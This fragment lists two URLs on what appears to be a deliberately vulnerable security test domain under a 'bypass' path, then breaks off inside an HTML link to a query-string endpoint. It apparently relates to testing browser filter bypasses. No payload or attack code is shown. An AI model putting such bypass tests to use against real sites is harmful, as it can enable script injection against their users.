https://vulnerabledoma.in/bypass/same-domain-link.html
https://www.vulnerabledoma.in/bypass/same-domain-link.html

    <a href="https://vulnerabledoma.in/bypass/text?q=